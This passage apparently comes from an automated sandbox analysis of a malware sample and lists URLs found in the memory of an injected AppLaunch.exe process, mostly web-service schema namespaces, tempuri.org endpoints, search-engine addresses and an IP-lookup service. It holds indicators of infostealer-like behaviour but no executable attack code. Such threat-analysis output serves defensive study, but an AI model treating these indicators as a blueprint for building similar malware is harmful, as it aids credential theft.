Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, conhost.exe, 0000000B.00000002.747239669.000001B080001000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://service.r
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://support.a
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://support.apple.com/kb/HT203092
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735232254.000000000713C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabt
Source: AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: https://get.adob
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: https://helpx.ad
